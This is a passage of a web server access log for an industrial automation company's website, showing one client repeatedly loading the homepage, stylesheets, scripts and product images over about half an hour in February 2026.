"https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10386] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20847] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10370] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20847] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10363] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20847] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:06:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10363] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10331] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20867] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10342] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https 